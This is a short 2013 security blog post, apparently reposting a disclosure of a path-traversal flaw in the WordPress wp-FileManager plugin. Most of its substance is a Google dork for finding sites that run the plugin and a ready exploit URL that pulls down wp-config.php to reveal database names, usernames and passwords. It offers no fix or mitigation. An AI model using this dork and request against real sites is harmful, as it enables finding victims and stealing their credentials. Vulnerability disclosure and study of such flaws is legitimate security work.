Wordpress wp-FileManager Vulnerability ~ Hacking while you're asleep

Friday, May 17, 2013

Wordpress wp-FileManager Vulnerability

ByEge has published a new weakness on wp-FileManager plugin. If you take advantage of this vulnerability, you could download for example the wp-config.php file where you can find out the database name, user name and password for the Wordpress site.

Google Dorks: inurl:wp-content/plugins/wp-filemanager/

Test : http://server/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download

Only works if "Allow Download" setting is checked in the FileManager's settings on the server.

Original source here.

Categories: Google Dorks, Wordpress

Posted on Friday, May 17, 2013 by Javier Nieto

No comments

Hacking while you're asleep

BehindTheFirewalls is a blog where you can find all the latest information about hacking techniques, new trends in IT security and the recent products offered by security manufacturers. We'll talk about Firewalls, IPS, Botnets...

Friday, May 17, 2013

Wordpress wp-FileManager Vulnerability

0 comments:

Post a Comment

About Me

FREE FOR YOU!!!

Popular Posts

Blog Archive

My Blog List

Total Pageviews

Labels

Contact